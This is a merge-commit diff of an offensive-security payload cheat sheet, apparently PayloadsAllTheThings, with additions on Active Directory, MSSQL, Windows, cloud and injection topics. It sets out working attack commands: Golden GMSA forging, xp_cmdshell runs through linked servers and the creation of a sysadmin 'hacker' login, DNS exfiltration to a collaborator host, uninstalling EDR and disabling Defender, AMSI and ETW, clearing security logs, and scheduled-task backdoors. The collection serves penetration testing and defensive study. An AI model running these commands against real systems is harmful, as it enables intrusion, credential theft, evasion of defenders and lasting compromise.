Merge branch 'swisskyrepo:master' into master

2025-01-30 15:15:04 +00:00 · 2022-04-20 09:32:52 +02:00 · 2022-04-20 09:32:52 +02:00 · 7d290ded54
commit 7d290ded54
parent 3db4d04467 b8bfa1f226
20 changed files with 628 additions and 217 deletions
--- a/Leaks/README.md
+++ b/Leaks/README.md
@ -25,6 +25,13 @@
 - [KeyFinder - is a tool that let you find keys while surfing the web!](https://github.com/momenbasel/KeyFinder)
 - [Keyhacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.](https://github.com/streaak/keyhacks)
 - [truffleHog - Find credentials all over the place](https://github.com/trufflesecurity/truffleHog)
    ```ps1
    docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo https://github.com/trufflesecurity/test_keys
    docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity
    trufflehog git https://github.com/trufflesecurity/trufflehog.git
    trufflehog github --endpoint https://api.github.com --org trufflesecurity --token GITHUB_TOKEN --debug --concurrency 2
    ```
 ## Exploit
--- a/S3/README.md
+++ b/S3/README.md
@ -52,6 +52,7 @@ By default the name of Amazon Bucket are like http://s3.amazonaws.com/[bucket_na
 http://s3.amazonaws.com/[bucket_name]/
 http://[bucket_name].s3.amazonaws.com/
 http://flaws.cloud.s3.amazonaws.com/
 https://buckets.grayhatwarfare.com/
 ```
 Their names are also listed if the listing is enabled.
--- a/Takeover/README.md
+++ b/Takeover/README.md
@ -10,6 +10,7 @@
    * [Weak Password Reset Token](#weak-password-reset-token)
    * [Leaking Password Reset Token](#leaking-password-reset-token)
    * [Password Reset Via Username Collision](#password-reset-via-username-collision)
    * [Account takeover due to unicode normalization issue](#account-takeover-due-to-unicode-normalization-issue)
 * [Account Takeover Via Cross Site Scripting](#account-takeover-via-cross-site-scripting)
 * [Account Takeover Via HTTP Request Smuggling](#account-takeover-via-http-request-smuggling)
 * [Account Takeover via CSRF](#account-takeover-via-csrf)
@ -116,6 +117,13 @@ Try to determine if the token expire or if it's always the same, in some cases t
 The platform CTFd was vulnerable to this attack. 
 See: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
 ### Account takeover due to unicode normalization issue
 - Victim account: `demo@gmail.com`
 - Attacker account: `demⓞ@gmail.com`
 ## Account Takeover Via Cross Site Scripting
 1. Find an XSS inside the application or a subdomain if the cookies are scoped to the parent domain : `*.domain.com`
--- a/Injection/README.md
+++ b/Injection/README.md
@ -18,6 +18,7 @@
   * [Bypass with double quote](#bypass-with-double-quote)
   * [Bypass with backslash and slash](#bypass-with-backslash-and-slash)
   * [Bypass with $@](#bypass-with-)
   * [Bypass with $()](#bypass-with--1)
   * [Bypass with variable expansion](#bypass-with-variable-expansion)
   * [Bypass with wildcards](#bypass-with-wildcards)
 * [Challenge](#challenge)
@ -209,6 +210,13 @@ echo $0
 echo whoami|$0
 ```
 ### Bypass with $()
 ```powershell
 who$()ami
 who$(echo am)i
 who`echo am`i
 ```
 #### Bypass with variable expansion
 ```powershell
--- a/Traversal/README.md
+++ b/Traversal/README.md
@ -99,6 +99,16 @@ To bypass this behaviour just add forward slashes in front of the url:
 ```http://nginx-server////////../../```
 ### Java Bypass
 Bypass Java's URL protocol
 ```powershell
 url:file:///etc/passwd
 url:http://127.0.0.1:8080
 ```
 ## Path Traversal
 ### Interesting Linux files
--- a/Deserialization/Python.md
+++ b/Deserialization/Python.md
@ -3,6 +3,7 @@
 ## Pickle
 The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object.
 :warning: `import cPickle` will only work on Python 2
 ```python
 import cPickle
@ -32,7 +33,7 @@ Python 2.7 documentation clearly states Pickle should never be used with untrust
 > The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
 ```python
-import cPickle
+import cPickle, os
 from base64 import b64encode, b64decode
 class Evil(object):
@ -47,4 +48,4 @@ print("Your Evil Token : {}").format(evil_token)
 ## References
 * [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/)
-* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/)
+* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/)
--- a/Resources/Active
+++ b/Resources/Active
@ -48,6 +48,7 @@
    - [Password in AD User comment](#password-in-ad-user-comment)
    - [Reading LAPS Password](#reading-laps-password)
    - [Reading GMSA Password](#reading-gmsa-password)
    - [Forging Golden GMSA](#forging-golden-gmsa)
    - [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets)
      - [Using Mimikatz](#using-mimikatz)
      - [Using Meterpreter](#using-meterpreter)
@ -1264,9 +1265,9 @@ lsadump::lsa /inject /name:krbtgt
 Useful when you want to have the clear text password or when you need to make stats about weak passwords.
 Recommended wordlists:
- rockyou (available in Kali Linux)
+- [Rockyou.txt](https://weakpass.com/wordlist/90)
- Have I Been Pwned founds (https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM))
+- [Have I Been Pwned founds](https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM))
- Weakpass.com
+- [Weakpass.com](https://weakpass.com/)
 - Read More at [Methodology and Resources/Hash Cracking.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md)
 ```powershell
@ -1282,7 +1283,6 @@ $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.
 ```
 :warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like :
 - ~~[hashes.org](https://hashes.org/check.php)~~
 - [hashmob.net](https://hashmob.net)
 - [crackstation.net](https://crackstation.net)
 - [hashes.com](https://hashes.com/en/decrypt/hash)
@ -1390,40 +1390,7 @@ or dump the Active Directory and `grep` the content.
 ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/
 ```
 ### Reading GMSA Password
 > User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically changed.
 #### GMSA Attributes in the Active Directory 
 * `msDS-GroupMSAMembership` (`PrincipalsAllowedToRetrieveManagedPassword`) - stores the security principals that can access the GMSA password.
 * `msds-ManagedPassword` - This attribute contains a BLOB with password information for group-managed service accounts.
 * `msDS-ManagedPasswordId` - This constructed attribute contains the key identifier for the current managed password data for a group MSA.
 * `msDS-ManagedPasswordInterval` - This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA.
 #### Extract NT hash from the Active Directory
 * [GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader) (C#)
  ```ps1
  # https://github.com/rvazarkar/GMSAPasswordReader
  GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT
  ```
 * [gMSADumper (Python)](https://github.com/micahvandeusen/gMSADumper)
   ```powershell
  # https://github.com/micahvandeusen/gMSADumper
  python3 gMSADumper.py -u User -p Password1 -d domain.local
  ```
 * Active Directory Powershell
  ```ps1
  $gmsa =  Get-ADServiceAccount -Identity 'SVC_SERVICE_ACCOUNT' -Properties 'msDS-ManagedPassword'
  $blob = $gmsa.'msDS-ManagedPassword'
  $mp = ConvertFrom-ADManagedPasswordBlob $blob
  $hash1 =  ConvertTo-NTHash -Password $mp.SecureCurrentPassword
  ```
 * [gMSA_Permissions_Collection.ps1](https://gist.github.com/kdejoyce/f0b8f521c426d04740148d72f5ea3f6f#file-gmsa_permissions_collection-ps1) based on Active Directory PowerShell module
 ### Reading LAPS Password
@ -1471,7 +1438,7 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll'
       foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}
       ```
- - From linux:
+ - From Linux:
   * [pyLAPS](https://github.com/p0dalirius/pyLAPS) to **read** and **write** LAPS passwords:
       ```bash
@ -1497,6 +1464,68 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll'
      ldapsearch -x -h  -D "@" -w  -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd`
      ```
 ### Reading GMSA Password
 > User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically rotated every 30 days to a randomly generated password of 256 bytes.
 #### GMSA Attributes in the Active Directory 
 * `msDS-GroupMSAMembership` (`PrincipalsAllowedToRetrieveManagedPassword`) - stores the security principals that can access the GMSA password.
 * `msds-ManagedPassword` - This attribute contains a BLOB with password information for group-managed service accounts.
 * `msDS-ManagedPasswordId` - This constructed attribute contains the key identifier for the current managed password data for a group MSA.
 * `msDS-ManagedPasswordInterval` - This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA.
 #### Extract NT hash from the Active Directory
 * [GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader) (C#)
  ```ps1
  # https://github.com/rvazarkar/GMSAPasswordReader
  GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT
  ```
 * [gMSADumper (Python)](https://github.com/micahvandeusen/gMSADumper)
   ```powershell
  # https://github.com/micahvandeusen/gMSADumper
  python3 gMSADumper.py -u User -p Password1 -d domain.local
  ```
 * Active Directory Powershell
  ```ps1
  $gmsa =  Get-ADServiceAccount -Identity 'SVC_SERVICE_ACCOUNT' -Properties 'msDS-ManagedPassword'
  $blob = $gmsa.'msDS-ManagedPassword'
  $mp = ConvertFrom-ADManagedPasswordBlob $blob
  $hash1 =  ConvertTo-NTHash -Password $mp.SecureCurrentPassword
  ```
 * [gMSA_Permissions_Collection.ps1](https://gist.github.com/kdejoyce/f0b8f521c426d04740148d72f5ea3f6f#file-gmsa_permissions_collection-ps1) based on Active Directory PowerShell module
 ### Forging Golden GMSA
 > One notable difference between a **Golden Ticket** attack and the **Golden GMSA** attack is that they no way of rotating the KDS root key secret. Therefore, if a KDS root key is compromised, there is no way to protect the gMSAs associated with it.
 * Using [GoldenGMSA](https://github.com/Semperis/GoldenGMSA)
    ```ps1
    # Enumerate all gMSAs
    GoldenGMSA.exe gmsainfo
    # Query for a specific gMSA
    GoldenGMSA.exe gmsainfo --sid S-1-5-21-1437000690-1664695696-1586295871-1112
    # Dump all KDS Root Keys
    GoldenGMSA.exe kdsinfo
    # Dump a specific KDS Root Key
    GoldenGMSA.exe kdsinfo --guid 46e5b8b9-ca57-01e6-e8b9-fbb267e4adeb
    # Compute gMSA password
    # --sid <gMSA SID>: SID of the gMSA (required)
    # --kdskey <Base64-encoded blob>: Base64 encoded KDS Root Key
    # --pwdid <Base64-encoded blob>: Base64 of msds-ManagedPasswordID attribute value
    GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 # requires privileged access to the domain
    GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 --kdskey AQAAALm45UZXyuYB[...]G2/M= # requires LDAP access
    GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 --kdskey AQAAALm45U[...]SM0R7djG2/M= --pwdid AQAAA[..]AAA # Offline mode
    ```
 ### Pass-the-Ticket Golden Tickets
 Forging a TGT require the `krbtgt` NTLM hash
@ -3556,3 +3585,4 @@ CME          10.XXX.XXX.XXX:445 HOSTNAME-01   [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
 * [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/)
 * [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/)
 * [AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo Martínez, Kurosh Dabbagh](https://www.blackarrow.net/ad-cs-from-manageca-to-rce/)
 * [Introducing the Golden GMSA Attack - YUVAL GORDON - March 01, 2022](https://www.semperis.com/blog/golden-gmsa-attack/)
--- a/Resources/Cloud
+++ b/Resources/Cloud
@ -13,6 +13,10 @@
    * [Enumeration methodology](#enumeration-methodology)
 * [Phishing with Evilginx2](#phishing-with-evilginx2)
 * [Illicit Consent Grant](#illicit-consent-grant)
    * [Register Application](#register-application)
    * [Configure Application](#configure-application)
    * [Setup 365-Stealer (Deprecated)](#setup-365-stealer-deprecated)
    * [Setup Vajra](#setup-vajra)
 * [Device Code Phish](#device-code-phish)
 * [Token from Managed Identity](#token-from-managed-identity)
    * [Azure API via Powershell](#azure-api-via-powershell)
@ -396,7 +400,7 @@ Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMS
    * User.ReadBasic.All
    * User.Read
-### Setup 365-Stealer
+### Setup 365-Stealer (Deprecated)
 :warning: Default port for 365-Stealer phishing is 443
@ -425,6 +429,10 @@ Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMS
    - `--refresh-token XXX --client-id YYY --client-secret ZZZ`: use a refresh token
 - Find the Phishing URL: go to `https://<IP/Domain>:<Port>` and click on **Read More** button or in the console.
 ### Setup Vajra
 > Vajra is a UI-based tool with multiple techniques for attacking and enumerating in the target's Azure environment. It features an intuitive web-based user interface built with the Python Flask module for a better user experience. The primary focus of this tool is to have different attacking techniques all at one place with web UI interfaces. - https://github.com/TROUBLE-1/Vajra
 **Mitigation**: Enable `Do not allow user consent` for applications in the "Consent and permissions menu".
--- a/Resources/MSSQL
+++ b/Resources/MSSQL
@ -14,6 +14,8 @@
 	* [Gather 5 Entries from a Specific Table](#gather-5-entries-from-a-specific-table)
    * [Dump common information from server to files](#dump-common-information-from-server-to-files)
 * [Linked Database](#linked-database)
 	* [Find Trusted Link](#find-trusted-link)
 	* [Execute Query Through The Link](#execute-query-through-the-link)
 	* [Crawl Links for Instances in the Domain](#crawl-links-for-instances-in-the-domain) 
 	* [Crawl Links for a Specific Instance](#crawl-links-for-a-specific-instance)
 	* [Query Version of Linked Database](#query-version-of-linked-database)
@ -22,7 +24,7 @@
 	* [Determine All the Tables Names from a Selected Linked Database](#determine-all-the-tables-names-from-a-selected-linked-database)
 	* [Gather the Top 5 Columns from a Selected Linked Table](#gather-the-top-5-columns-from-a-selected-linked-table)
 	* [Gather Entries from a Selected Linked Column](#gather-entries-from-a-selected-linked-column)
-	* [Command Execution via xp_cmdshell](#command-execution-via-xp_cmdshell)
+* [Command Execution via xp_cmdshell](#command-execution-via-xp_cmdshell)
 * [Extended Stored Procedure](#extended-stored-procedure)
 	* [Add the extended stored procedure and list extended stored procedures](#add-the-extended-stored-procedure-and-list-extended-stored-procedures)
 * [CLR Assemblies](#clr-assemblies)
@ -54,6 +56,7 @@
 	* [Find SQL Server Logins Which can be Impersonated for the Current Database](#find-sql-server-logins-which-can-be-impersonated-for-the-current-database)
 	* [Exploiting Impersonation](#exploiting-impersonation)
 	* [Exploiting Nested Impersonation](#exploiting-nested-impersonation)
 	* [MSSQL Accounts and Hashes](#mssql-accounts-and-hashes)
 * [References](#references)
 ## Identify Instances and Databases
@ -129,6 +132,31 @@ Invoke-SQLDumpInfo -Verbose -Instance SQLSERVER1\Instance1 -csv
 ## Linked Database
 ### Find Trusted Link
 ```sql
 select * from master..sysservers
 ```
 ### Execute Query Through The Link
 ```sql
 -- execute query through the link
 select * from openquery("dcorp-sql1", 'select * from master..sysservers')
 select version from openquery("linkedserver", 'select @@version as version');
 -- chain multiple openquery
 select version from openquery("link1",'select version from openquery("link2","select @@version as version")')
 -- execute shell commands
 EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer
 select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')
 -- create user and give admin privileges
 EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
 EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
 ```
 ### Crawl Links for Instances in the Domain 
 A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results
@ -194,28 +222,63 @@ Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openque
 ```
-### Command Execution via xp_cmdshell
+## Command Execution via xp_cmdshell
 > xp_cmdshell disabled by default since SQL Server 2005
 ```ps1
-Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command whoami
+PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command whoami
-Creates and adds local user backup to the local administrators group:
+
-Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "net user backup Password1234 /add' -Verbose
+# Creates and adds local user backup to the local administrators group:
-Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "net localgroup administrators backup /add" -Verbose
+PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "net user backup Password1234 /add'" -Verbose
 PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "net localgroup administrators backup /add" -Verbose
 ```
 * Manually execute the SQL query
 	```sql
 	EXEC xp_cmdshell "net user";
 	EXEC master..xp_cmdshell 'whoami'
 	EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
 	EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';
 	```
 * If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
 	```sql
 	EXEC sp_configure 'show advanced options',1;
 	RECONFIGURE;
 	EXEC sp_configure 'xp_cmdshell',1;
 	RECONFIGURE;
 	```
 * If the procedure was uninstalled
 	```sql
 	sp_addextendedproc 'xp_cmdshell','xplog70.dll'
 	```
 ## Extended Stored Procedure
 ### Add the extended stored procedure and list extended stored procedures
 ```ps1
 # Create evil DLL
 Create-SQLFileXpDll -OutFile C:\temp\test.dll -Command "echo test > c:\temp\test.txt" -ExportName xp_test
 # Load the DLL and call xp_test
 Get-SQLQuery -UserName sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Query "sp_addextendedproc 'xp_test', '\\10.10.0.1\temp\test.dll'"
 Get-SQLQuery -UserName sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Query "EXEC xp_test"
 # Listing existing
 Get-SQLStoredProcedureXP -Instance "<DBSERVERNAME\DBInstance>" -Verbose
 ```
 * Build a DLL using [xp_evil_template.cpp](https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/xp_evil_template.cpp)
 * Load the DLL
 	```sql
 	-- can also be loaded from UNC path or Webdav
 	sp_addextendedproc 'xp_calc', 'C:\mydll\xp_calc.dll'
 	EXEC xp_calc
 	sp_dropextendedproc 'xp_calc'
 	```
 ## CLR Assemblies
 Prerequisites:
@ -321,6 +384,8 @@ GO
 ## OLE Automation
 * :warning: Disabled by default
 ### Execute commands using OLE automation procedures
 ```ps1
@ -364,9 +429,22 @@ Subsystem Options:
 –Subsystem Jscript
 ```
 ```sql
 USE msdb; 
 EXEC dbo.sp_add_job @job_name = N'test_powershell_job1'; 
 EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'$name=$env:COMPUTERNAME[10];nslookup "$name.redacted.burpcollaborator.net"', @retry_attempts = 1, @retry_interval = 5 ;
 EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; 
 EXEC dbo.sp_start_job N'test_powershell_job1';
 -- delete
 EXEC dbo.sp_delete_job @job_name = N'test_powershell_job1';
 ```
 ### List All Jobs
 ```ps1
 SELECT job_id, [name] FROM msdb.dbo.sysjobs;
 SELECT job.job_id, notify_level_email, name, enabled, description, step_name, command, server, database_name FROM msdb.dbo.sysjobs job INNER JOIN msdb.dbo.sysjobsteps steps ON job.job_id = steps.job_id
 Get-SQLAgentJob -Instance "<DBSERVERNAME\DBInstance>" -username sa -Password Password1234 -Verbose
 ```
@ -537,8 +615,30 @@ SELECT ORIGINAL_LOGIN()
 SELECT SYSTEM_USER
 ```
 ### MSSQL Accounts and Hashes
 ```sql
 MSSQL 2000:
 SELECT name, password FROM master..sysxlogins
 SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)
 MSSQL 2005
 SELECT name, password_hash FROM master.sys.sql_logins
 SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
 ```
 Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat.txt /usr/share/wordlists/rockyou.txt --force`
 ```ps1
 131	MSSQL (2000)	0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578
 132	MSSQL (2005)	0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe
 1731	MSSQL (2012, 2014)	0x02000102030434ea1b17802fd95ea6316bd61d2c94622ca3812793e8fb1672487b5c904a45a31b2ab4a78890d563d2fcf5663e46fe797d71550494be50cf4915d3f4d55ec375
 ```
 ## References
 * [PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt](https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3)
 * [PowerUpSQL Cheat Sheet - Scott Sutherland](https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet)
-* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/)
+* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/)
 * [MSSQL Agent Jobs for Command Execution - Nicholas Popovich - September 21, 2016](https://www.optiv.com/explore-optiv-insights/blog/mssql-agent-jobs-command-execution)
--- a/Resources/Windows
+++ b/Resources/Windows
@ -8,6 +8,7 @@
    * [Antivirus Removal](#antivirus-removal)
    * [Disable Windows Defender](#disable-windows-defender)
    * [Disable Windows Firewall](#disable-windows-firewall)
    * [Clear System and Security Logs](#clear-system-and-security-logs)
 * [Simple User](#simple-user)
    * [Registry HKCU](#registry-hkcu)
    * [Startup](#startup)
@ -31,6 +32,7 @@
        * [sethc.exe](#sethc.exe)
    * [Remote Desktop Services Shadowing](#remote-desktop-services-shadowing)
    * [Skeleton Key](#skeleton-key)
    * [Virtual Machines](#virtual-machines)
 * [Domain](#domain)
    * [Golden Certificate](#golden-certificate)
    * [Golden Ticket](#golden-ticket)
@ -55,6 +57,34 @@ PS> attrib +h mimikatz.exe
 * [Sophos Removal Tool.ps1](https://github.com/ayeskatalas/Sophos-Removal-Tool/)
 * [Symantec CleanWipe](https://knowledge.broadcom.com/external/article/178870/download-the-cleanwipe-removal-tool-to-u.html)
 * [Elastic EDR/Security](https://www.elastic.co/guide/en/fleet/current/uninstall-elastic-agent.html)
    ```ps1
    cd "C:\Program Files\Elastic\Agent\"
    PS C:\Program Files\Elastic\Agent> .\elastic-agent.exe uninstall
    Elastic Agent will be uninstalled from your system at C:\Program Files\Elastic\Agent. Do you want to continue? [Y/n]:Y
    Elastic Agent has been uninstalled.
    ```
 * [Cortex XDR](https://mrd0x.com/cortex-xdr-analysis-and-bypass/)
    ```ps1
    # Global uninstall password: Password1
    Password hash is located in C:\ProgramData\Cyvera\LocalSystem\Persistence\agent_settings.db
    Look for PasswordHash, PasswordSalt or password, salt strings.
    # Disable Cortex: Change the DLL to a random value, then REBOOT
    reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CryptSvc\Parameters /t REG_EXPAND_SZ /v ServiceDll /d nothing.dll /f
    # Disables the agent on startup (requires reboot to work)
    cytool.exe startup disable
    # Disables protection on Cortex XDR files, processes, registry and services
    cytool.exe protect disable
    # Disables Cortex XDR (Even with tamper protection enabled)
    cytool.exe runtime disable
    # Disables event collection
    cytool.exe event_collection disable
    ```
 ### Disable Windows Defender
@ -64,19 +94,30 @@ sc config WinDefend start= disabled
 sc stop WinDefend
 Set-MpPreference -DisableRealtimeMonitoring $true
 # Wipe currently stored definitions
 # Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\<antimalware platform version>
 MpCmdRun.exe -RemoveDefinitions -All
 ## Exclude a process / location
 Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
 Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
 Add-MpPreference -ExclusionPath C:\Video, C:\install
 # Disable scanning all downloaded files and attachments, disable AMSI (reactive)
 PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
 PS C:\> Set-MpPreference -DisableIOAVProtection $true
 # Disable AMSI (set to 0 to enable)
 PS C:\> Set-MpPreference -DisableScriptScanning 1 
 # Blind ETW Windows Defender: zero out registry values corresponding to its ETW sessions
 reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
 # Wipe currently stored definitions
 # Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\<antimalware platform version>
 MpCmdRun.exe -RemoveDefinitions -All
 # Remove signatures (if Internet connection is present, they will be downloaded again):
 PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All
 PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
 ```
 ### Disable Windows Firewall
 ```powershell
@ -87,6 +128,13 @@ NetSh Advfirewall set allprofiles state off
 New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP
 ```
 ### Clear System and Security Logs
 ```powershell
 cmd.exe /c wevtutil.exe cl System
 cmd.exe /c wevtutil.exe cl Security
 ```
 ## Simple User
 Set a file as hidden
@ -138,36 +186,38 @@ SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -
 ### Scheduled Tasks User
-Using native **schtask**
+* Using native **schtask** - Create a new task
    ```powershell
    # Create the scheduled tasks to run once at 00.00
    schtasks /create /sc ONCE /st 00:00 /tn "Device-Synchronize" /tr C:\Temp\revshell.exe
    # Force run it now !
    schtasks /run /tn "Device-Synchronize"
    ```
 * Using native **schtask** - Leverage the `schtasks /change` command to modify existing scheduled tasks
    ```powershell
    # Launch an executable by calling the ShellExec_RunDLL function.
    SCHTASKS /Change /tn "\Microsoft\Windows\PLA\Server Manager Performance Monitor" /TR "C:\windows\system32\rundll32.exe SHELL32.DLL,ShellExec_RunDLLA C:\windows\system32\msiexec.exe /Z c:\programdata\S-1-5-18.dat" /RL HIGHEST /RU "" /ENABLE
    ```
-```powershell
+* Using Powershell
-# Create the scheduled tasks to run once at 00.00
+    ```powershell
-schtasks /create /sc ONCE /st 00:00 /tn "Device-Synchronize" /tr C:\Temp\revshell.exe
+    PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
-# Force run it now !
+    PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"
-schtasks /run /tn "Device-Synchronize"
+    PS C:\> $P = New-ScheduledTaskPrincipal "Rasta"
-```
+    PS C:\> $S = New-ScheduledTaskSettingsSet
    PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
    PS C:\> Register-ScheduledTask Backdoor -InputObject $D
    ```
-Using Powershell
+* Using SharPersist
    ```powershell
    # Add to a current scheduled task
    SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
-```powershell
+    # Add new task
-PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
+    SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add
-PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"
+    SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly
-PS C:\> $P = New-ScheduledTaskPrincipal "Rasta"
+    ```
 PS C:\> $S = New-ScheduledTaskSettingsSet
 PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
 PS C:\> Register-ScheduledTask Backdoor -InputObject $D
 ```
 Using SharPersist
 ```powershell
 # Add to a current scheduled task
 SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
 # Add new task
 SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add
 SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly
 ```
 ### BITS Jobs
@ -393,6 +443,54 @@ Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DC
 Enter-PSSession -ComputerName <AnyMachineYouLike> -Credential <Domain>\Administrator
 ```
 ### Virtual Machines
 > Based on the Shadow Bunny technique.
 ```ps1
 # download virtualbox
